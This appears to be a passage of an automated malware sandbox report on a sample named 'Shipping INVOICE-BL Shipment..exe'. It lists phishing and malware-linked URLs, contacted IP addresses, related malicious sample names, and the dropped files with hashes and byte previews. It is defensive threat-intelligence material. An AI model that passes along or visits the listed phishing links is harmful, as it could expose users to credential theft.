                                                                            https://agjwxdkpqlmqklurjaovxhcdfc-dot-gloff00403993445.uk.r.appspot.com/#kynan.doha@fordway.com&data=04|01|kynan.doha@fordway.com|e82b1ab95d564094873f08d891edc7dc|92f571261c684e5180855cb2e14cc381|1|0|637419797746769194|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=ZTxemzXa/xUx+Bg3lTShaT+EzejxRYLSPxP6RLnzsM0=&reserved=0Get hashmaliciousBrowse
                                                                            • 172.217.168.84
                                                                            https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                            • 172.217.168.52
                                                                            http://pma.climabitus.com/undercook.phpGet hashmaliciousBrowse
                                                                            • 216.58.215.225
                                                                            https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                                                            • 216.58.212.162
                                                                            PO98765.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            Booking Confirmation.xlsxGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            PI202009255687.xlsxGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            VOMAXTRADING.docGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            ACCOUNT TEAM.pptGet hashmaliciousBrowse
                                                                            • 172.217.168.1
                                                                            purchase order.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            inv.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3DGet hashmaliciousBrowse
                                                                            • 172.217.168.84
                                                                            2020112395387_pdf.exeGet hashmaliciousBrowse
                                                                            • 35.246.6.109
                                                                            anthon.exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            http://searchlf.comGet hashmaliciousBrowse
                                                                            • 74.125.128.154
                                                                            RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                            • 34.102.136.180
                                                                            DIGITALOCEAN-ASNUSCompensationClaim-261722907-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            CompensationClaim-261722907-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            http://searchlf.comGet hashmaliciousBrowse
                                                                            • 82.196.7.246
                                                                            Izezma64.dllGet hashmaliciousBrowse
                                                                            • 68.183.89.248
                                                                            fuxenm32.dllGet hashmaliciousBrowse
                                                                            • 68.183.89.248
                                                                            ebuQ5cmR6y.docGet hashmaliciousBrowse
                                                                            • 138.197.207.88
                                                                            https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45Get hashmaliciousBrowse
                                                                            • 161.35.15.77
                                                                            22.exeGet hashmaliciousBrowse
                                                                            • 134.122.48.156
                                                                            CompensationClaim-310074970-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            CompensationClaim-310074970-11242020.xlsGet hashmaliciousBrowse
                                                                            • 157.245.97.213
                                                                            https://cts.indeed.com/v0?tk=1df9t5skc2g3980p&r=%68%74%74%70%73%3a%2f%2f%61%6e%61%6c%79%74%69%63%73%2e%74%77%69%74%74%65%72%2e%63%6f%6d%2f%64%61%61%2f%30%2f%64%61%61%5f%6f%70%74%6f%75%74%5f%61%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%5f%69%64%3d%33%26%70%61%72%74%69%63%69%70%61%6e%74%5f%69%64%3d%37%31%36%26%72%64%3d%68%74%74%70%73%3a%2f%2f%66%72%61%31%2e%64%69%67%69%74%61%6c%6f%63%65%61%6e%73%70%61%63%65%73%2e%63%6f%6d%2f%73%32%32%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f#matthias.kirsch@iti.orgGet hashmaliciousBrowse
                                                                            • 5.101.109.44
                                                                            C03N224Hbu.exeGet hashmaliciousBrowse
                                                                            • 206.189.230.189
                                                                            Izipubob.dllGet hashmaliciousBrowse
                                                                            • 68.183.54.143
                                                                            http://ttixwac.sed.ocscreenwriter.comGet hashmaliciousBrowse
                                                                            • 138.197.59.238
                                                                            nivude1.dllGet hashmaliciousBrowse
                                                                            • 68.183.54.143
                                                                            Accesshover.dllGet hashmaliciousBrowse
                                                                            • 68.183.54.143
                                                                            https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                            • 157.230.76.65
                                                                            https://ilovesanmarzanodop.com/wp-content/uploads/2020/supp/adfs/index.htmlGet hashmaliciousBrowse
                                                                            • 164.90.215.56
                                                                            qWuT75h3FNx6Mbp.exeGet hashmaliciousBrowse
                                                                            • 46.101.142.174
                                                                            http://192.241.239.251Get hashmaliciousBrowse
                                                                            • 192.241.239.251

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe4IZjnTicql.exeGet hashmaliciousBrowse
                                                                              vthr97FHLT.rtfGet hashmaliciousBrowse
                                                                                mses.exeGet hashmaliciousBrowse
                                                                                  Wire slip.exeGet hashmaliciousBrowse
                                                                                    uiWs90xemq.exeGet hashmaliciousBrowse
                                                                                      mMpUmTDiLo.exeGet hashmaliciousBrowse
                                                                                        SO12145970.exeGet hashmaliciousBrowse
                                                                                          order.exeGet hashmaliciousBrowse
                                                                                            Ca5l6Ndopx.exeGet hashmaliciousBrowse
                                                                                              Dhl package - pdf.exeGet hashmaliciousBrowse
                                                                                                BOQ Specification.exeGet hashmaliciousBrowse
                                                                                                  Drawings For MOPA.exeGet hashmaliciousBrowse
                                                                                                    C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dllzgUsJgf4Tz.exeGet hashmaliciousBrowse
                                                                                                      TwptRHhOAE.docGet hashmaliciousBrowse
                                                                                                        yHn715noho.exeGet hashmaliciousBrowse
                                                                                                          vxLhI0gpXQ.exeGet hashmaliciousBrowse
                                                                                                            Wire TT.exeGet hashmaliciousBrowse
                                                                                                              mananyi.exeGet hashmaliciousBrowse
                                                                                                                Bukti transfer-07-03-2020.exeGet hashmaliciousBrowse
                                                                                                                  y7VVT4uCPj.exeGet hashmaliciousBrowse
                                                                                                                    Bank wire receipt.exeGet hashmaliciousBrowse
                                                                                                                      C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll#U062f#U0644#U064a#U0644 #U0639#U0644#U0649 #U0627#U0644#U062f#U0641#U0639.exeGet hashmaliciousBrowse
                                                                                                                        7Dn18AigNe.exeGet hashmaliciousBrowse
                                                                                                                          aps.exeGet hashmaliciousBrowse
                                                                                                                            Wire confirmation_pdf.exeGet hashmaliciousBrowse
                                                                                                                              DHL_AWB_INV_9882900_99862788_998.exeGet hashmaliciousBrowse
                                                                                                                                ZjAWsG7aGq.exeGet hashmaliciousBrowse

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\12.opends60.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):53
                                                                                                                                  Entropy (8bit):4.239357190608839
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:p/uBEp/EiOmB4EAOM1F:RcAk2KHP
                                                                                                                                  MD5:DAA2B2B53C73519E2CFE5239A33D7FE2
                                                                                                                                  SHA1:4CDC35F6B76191DFB8045FFA68994AD7D470491A
                                                                                                                                  SHA-256:079BBC83AE9ECB7D781BD24EEDBAEEE2B58009906739990C97A0976AB9332E81
                                                                                                                                  SHA-512:2130E15A5686EE1788C29C2022922C128257EB7C45313B49DD2946A23C9D9A78B7CB0AD3C700B2C3FFDD9225B5D9A020DE9B4A01114D771C4A850507F72E950C
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview: ......L....9!...D..._srv_ansi_paramdata.opends60.dll.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\66.opends60.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):42
                                                                                                                                  Entropy (8bit):4.034709089239382
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:p/uBJzETOM1F:RcGHP
                                                                                                                                  MD5:3F2A75E68F8D67494B386DFAA5ABE2B3
                                                                                                                                  SHA1:F405E0BC8B4FC2CAD111045C67E3C64343E2C7CA
                                                                                                                                  SHA-256:E7AB6B06A1134F3EFE20FC5816AD5402C8E111FBD5031EC4F2C520224B9D5BDB
                                                                                                                                  SHA-512:A7909C511287C5A2F59992BD674998D0714F100CEAB30168D9C9F85FC3E6B9BA76D0066C2CEA3FEED9AE2E651605FDD0F3992C849300B9C073F4CB1D05ADA90E
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview: ......L....9........_srv_run.opends60.dll.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):27648
                                                                                                                                  Entropy (8bit):4.228986376506815
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:o4Fw3juO2A7BJ4a8VtZdGzcoRA3qswV/iYeSWsaeW7+J8d:5FmcaqGwoRA3qswV/ZeB6J
                                                                                                                                  MD5:FE529E3B23EA66C07B43314EF0081B58
                                                                                                                                  SHA1:5CC7F144DCCB312B0DC6BA7AD0CB2456F2FC3C61
                                                                                                                                  SHA-256:C2FA4308C73812360FC3FB01201B0FC9D1C6B53451ED15DF3739088A4C8789D5
                                                                                                                                  SHA-512:8CA88376FB051481C44C51FDF38D90BADEBB255AF2DAC51DDB298AA0F203F1130DAE73D667F1CACCE4E6D80CDC846DBE09FA7A2BB0790E80FF8E584B55E3C6D8
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: zgUsJgf4Tz.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: TwptRHhOAE.doc, Detection: malicious, Browse
                                                                                                                                  • Filename: yHn715noho.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: vxLhI0gpXQ.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Wire TT.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: mananyi.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Bukti transfer-07-03-2020.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: y7VVT4uCPj.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Bank wire receipt.exe, Detection: malicious, Browse
                                                                                                                                  Reputation:low
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....3C...........!.........j.....................n.....................................................................................g...........................................................................................................rsrc....g.......h..................@..@.reloc...............j..............@..B............................@.......X.......p...........................................................................................................................e...(...f...@...g...X...h...p...i.......j.......k.......l.......m.......u.......{...........0....#..H...T$..`...................~...x...................................3.......4.......9... ...:...8...G...P.......h...........................................-...................................(.......................@...........
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36864
                                                                                                                                  Entropy (8bit):4.076507463551346
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:CZPGn19CO5ESSQhJm9hMKCMI6g6ihJSxUCR1rgCPKabK2t0X5P7DZ+R/WeM2W:CVgRESSSKMBMI6FRJjM
                                                                                                                                  MD5:27280F57DF0638B41F709DAC754330D8
                                                                                                                                  SHA1:B7F3BF2C0BF39E523B7E4C79D7DAFD1E59B84B60
                                                                                                                                  SHA-256:75D22B4B3D7CD995B99CA4EB3EFA782F3BDFF9675BC64CCE409223109FDA6DE7
                                                                                                                                  SHA-512:8444E270D52F17E077D2B3A5B149FCF9029761B6E37411F213A055CB0942BE859EB60547CC4F1411F503EFB50D0D5539C3671F0CF6E2B9C1D9506E07DA21D869
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: #U062f#U0644#U064a#U0644 #U0639#U0644#U0649 #U0627#U0644#U062f#U0641#U0639.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 7Dn18AigNe.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: aps.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Wire confirmation_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: DHL_AWB_INV_9882900_99862788_998.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: ZjAWsG7aGq.exe, Detection: malicious, Browse
                                                                                                                                  Reputation:low
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.3C...........!.....`... ......N.... .........l. ..............................~........................................~..O...................................|~............................................... ............... ..H............text...T_... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\competitorsalesliterature.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5902
                                                                                                                                  Entropy (8bit):4.93869769577694
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:TF+NU24NUNQYtsSztsOBtsWYtso9hj/Y3P:TcU2IUqosSpsGsWose8
                                                                                                                                  MD5:AE2BF9A46C64D68E42ECB985C1D2DE71
                                                                                                                                  SHA1:9697E538D714CDF375EA907738DBFD219A0853FB
                                                                                                                                  SHA-256:0F98148F02B339F99B13587FD33F9796CC2E8DA76FFBB4EB27AF6C3D2CBAC945
                                                                                                                                  SHA-512:AA62BA3EB0BDD2F9DB3FD74000C5D709131DFD48928A93FDF570790F6123C39D3E50BCAAEB2C3C472B5471A241D6ACE93E8DE19CE3D8CAB7EAE1B9C3932D9E9D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview: .<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='entity.xsl'?>..<Entity xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <id>a8e2826b-b430-4c13-8765-d2b009e48f99</id>.. <name>CompetitorSalesLiterature</name>.. <physicalname>CompetitorSalesLiterature</physicalname>.. <logicalname>competitorsalesliterature</logicalname>.. <intersect>true</intersect>.. <security>false</security>.. <lookup>false</lookup>.. <assignment>false</assignment>.. <integrationeventmask>0</integrationeventmask>.. <workfloweventmask>0</workfloweventmask>.. <islogical>false</islogical>.. <Column>.. <id>41607dc6-fea4-4e40-9f7d-f0c2c71d79ee</id>.. <column>1</column>.. <in-code-name>competitorid</in-code-name>.. <logicalname>competitorid</logicalname>.. <physicalname>CompetitorId</physicalname>.. <length-bytes>16</length-bytes>.. <length-chars />.. <nullable>no</nullable>.. <is-pk-column>yes</is-pk
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\flac.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2706
                                                                                                                                  Entropy (8bit):5.179516218922872
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFfH8vKYndVmmXlTkeH9vI5CduyrmmVp2i45dMg8FaTqye+B0Soqks4cyyRgLRdn:/KYn3mmXl4o1wCduyrmmVp2i4LMg8Fac
                                                                                                                                  MD5:DABA225688B554152EB810A36D5AAA0B
                                                                                                                                  SHA1:B21070F810E2F18F198BB08409CA14EFC9EAEF5C
                                                                                                                                  SHA-256:1806FD102100C6F3748942670CAAB86C19F7564CD69BB96A1FC0B29929230CCF
                                                                                                                                  SHA-512:E3B7834082281B31F9C15E8A2B580AD1ABAC9718C9866454135B8D1A83E62916FF17D5B9FB1CADF2AE80BF6C4DF9F1DDD98D0037A9A923DCBB2D56FB86D6A3BB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/flac">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>FLAC audio</comment>. <comment xml:lang="ar">FLAC ....</comment>. <comment xml:lang="be@latin">A.dyjo FLAC</comment>. <comment xml:lang="bg">..... . FLAC</comment>. <comment xml:lang="ca">.udio FLAC</comment>. <comment xml:lang="cs">zvuk FLAC</comment>. <comment xml:lang="da">FLAC-lyd</comment>. <comment xml:lang="de">FLAC-Audio</comment>. <comment xml:lang="el">.... FLAC</comment>. <comment xml:lang="en_GB">FLAC audio</comment>. <comment xml:lang="eo">FLAC-sondosiero</comment>. <comment xml:lang="es">sonido FLAC</comment>. <comment xml:lang="eu">FLAC audioa</comment>. <comment xml:lang="fi">FLAC-..ni</comment>. <comment xml:lang="fo">FLAC lj..ur</comment>. <comment xml:lang="fr">audio FLAC</comment>. <comment xml:lang="ga">fuaim FLAC</commen
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39104
                                                                                                                                  Entropy (8bit):6.237597979894025
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:QRi/Yplgp4V5qWNqYoMfTF/K4itMpdRJDh9ODV0L3d/o+X:AKYLHV5ZNbnFy4itMpdD7ODV0R/oK
                                                                                                                                  MD5:58C655527B57D74AE3C189A60A42DA18
                                                                                                                                  SHA1:F267630311A1C42CE9C4F0DEDA00E4132E9F8B25
                                                                                                                                  SHA-256:A2F590DEA50CDE47B0325D7A9ADEEA464257F46B76C059CF3E1AB2DB65574685
                                                                                                                                  SHA-512:03C708A23339792802F506278891005E521B7188D0558FCC0F25DFD0C7CB0048C8FBF1F9FB1AC65FD6EF4BC4C7CAC1715BCD8F07DD82E3E6770E327CC630E209
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: 4IZjnTicql.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: vthr97FHLT.rtf, Detection: malicious, Browse
                                                                                                                                  • Filename: mses.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Wire slip.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: uiWs90xemq.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: mMpUmTDiLo.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SO12145970.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: order.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Ca5l6Ndopx.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Dhl package - pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: BOQ Specification.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Drawings For MOPA.exe, Detection: malicious, Browse
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|..|..|......}..[...y..[...i..[...x....}....w..|......[...v..[...}..[...}..Rich|..........................PE..L...".3C.................4...F......D8.......P....@..........................................................................n.......................~...............T...............................h..@............P...............................text...:3.......4.................. ..`.rdata...)...P...*...8..............@..@.data................b..............@....rsrc................d..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\thermal-cpu-cdev-order.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:exported SGML document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):508
                                                                                                                                  Entropy (8bit):4.640723757143228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:pvPN+VnvbZdr5vZb1bBZb8bZbTZbqMB1C:tsb/r5vZb1FZbYZbTZbqMB1C
                                                                                                                                  MD5:6BBB6D648BA2C70B9635E843818BEEBB
                                                                                                                                  SHA1:21BF5A1ACF381285EF3FE88D180B3F17D474804C
                                                                                                                                  SHA-256:9E4A02255ACD8A4C10373B6E64454A95E57986C32245A6EDA7B8CF7F57E3D740
                                                                                                                                  SHA-512:000324D55AC800870CC761C260A3DEE1EB4FA363426AE1C525FE72503502D4AA9F51104CFAB657C6F55D137BD3F1DDC5A1A4ACBA8F022468C0C1721AEFCB1A79
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: . .Specifies the order of compensation to cool CPU only..There is a default already implemented in the code, but.this file can be used to change order..The Following cooling device can present.-->..<CoolingDeviceOrder>.. Specify Cooling device order -->..<CoolingDevice>rapl_controller</CoolingDevice>..<CoolingDevice>intel_pstate</CoolingDevice>..<CoolingDevice>intel_powerclamp</CoolingDevice>..<CoolingDevice>cpufreq</CoolingDevice>..<CoolingDevice>Processor</CoolingDevice>.</CoolingDeviceOrder>..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\vnd.ms-excel.sheet.macroenabled.12.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):7697
                                                                                                                                  Entropy (8bit):5.515382730457339
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:xAYS+gpcZWaIarmt/Omdwgm+Wz+BKUpva8i+NfY+g+uP+p+1dS59F0+9mo0my+Cn:9XxBi0Wxko7OXe8j57T2pgIcB
                                                                                                                                  MD5:5A6CAD444DBF130B22F855A889DBE677
                                                                                                                                  SHA1:8F91D234CBE3AFC1F1993BE8C63A68F756FDFC83
                                                                                                                                  SHA-256:A76702F606092D47669779F8D48F2F701319437223D87EAD41D2FA068522FF87
                                                                                                                                  SHA-512:3D777032EF8CE336E233F43A6FBDC08CFC305FE22A91433A580922A035FD71C819B423D314A888F8875FCCD0E89B3869553A38A9B20A6D078B4BDCF398818E85
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/vnd.ms-excel.sheet.macroEnabled.12">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment xml:lang="be@latin">Ra.likovy akru. Excel</comment>. <comment xml:lang="en_GB">Excel spreadsheet</comment>. <comment xml:lang="fo">Excel rokniark</comment>. <comment xml:lang="ia">Folio de calculo Excel</comment>. <comment xml:lang="pt_BR">Planilha do Excel</comment>. <comment xml:lang="sq">Flet. llogaritje Excel</comment>. <comment xml:lang="zh_CN">Excel ....</comment>. <comment xml:lang="zh_TW">Excel ...</comment>. <generic-icon name="x-office-spreadsheet"/>. <glob pattern="*.xlsm"/>. <sub-class-of type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"/>. <comment>Microsoft Excel Worksheet</comment>. <comment xml:lang="af">Microsoft Excel-werkvel</comment>. <comment xml:lang="am">Microsoft Exce
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\x-texinfo.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3100
                                                                                                                                  Entropy (8bit):5.010092205102224
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:nMxJAtLuI0UYJmMcaRb2kV2JjUWBULitlqp8cwngpzQNzxkK3eTHg3GXGSIDMH79:nD0bqFi2I5
                                                                                                                                  MD5:61FFA6F5926C7F2CF819C2A0774D3E21
                                                                                                                                  SHA1:BEC77DA7C7492860DA713F8B87279CB1A3DDCB11
                                                                                                                                  SHA-256:07A5F4DFB449940A7BEA1F100120AE284067F24961457FF5F56C16F556BE4856
                                                                                                                                  SHA-512:3556CAC3A1713FF61D297F9837841DE8DB31CD90AAB848AA2BAE6BF8B1F6BFA4D42AD10324C9BAEA65BE7F08359267952B37B531C8823E4EF859202AD5AB45EB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="text/x-texinfo">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>TeXInfo document</comment>. <comment xml:lang="ar">..... TeXInfo</comment>. <comment xml:lang="ast">Documentu TeXInfo</comment>. <comment xml:lang="az">TeXInfo s.n.di</comment>. <comment xml:lang="be@latin">Dakument TeXInfo</comment>. <comment xml:lang="bg">........ . TeXInfo</comment>. <comment xml:lang="ca">document TeXInfo</comment>. <comment xml:lang="cs">dokument TeXInfo</comment>. <comment xml:lang="cy">Dogfen TeXInfo</comment>. <comment xml:lang="da">TeXInfo-dokument</comment>. <comment xml:lang="de">TeXInfo-Dokument</comment>. <comment xml:lang="el">....... TeXInfo</comment>. <comment xml:lang="en_GB">TeXInfo document</comment>. <comment xml:lang="eo">TeXInfo-dokumento</comment>. <comment xml:lang="es">documento de TeXInfo</comme
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Erodium
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):238433
                                                                                                                                  Entropy (8bit):7.998471610150145
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:BQfR8c9EBhNjuw4YNm8vH128zEoE/qG/ydG5h3aYvDUImzle+wX3:BQxUSw4YNXdJvE/qwakLvDupEH
                                                                                                                                  MD5:980A6B092855D202363B6436E4A854E8
                                                                                                                                  SHA1:AA8E1A7E1AB7832C3112E5C35B7DA143FF919CE0
                                                                                                                                  SHA-256:F617D029F947EBB5C0B7B159233E699F5653A1F92E81F9FE44C60555884DC93C
                                                                                                                                  SHA-512:6DEDF42A718DBC5A4AD25C20561C3ADC0FC629D1135AA68D02FC264363617C827FE7EAA0DD49E828DF93D80852B4E5AA8C932B20D43FF833C02C4B868DF30367
                                                                                                                                  Malicious:false
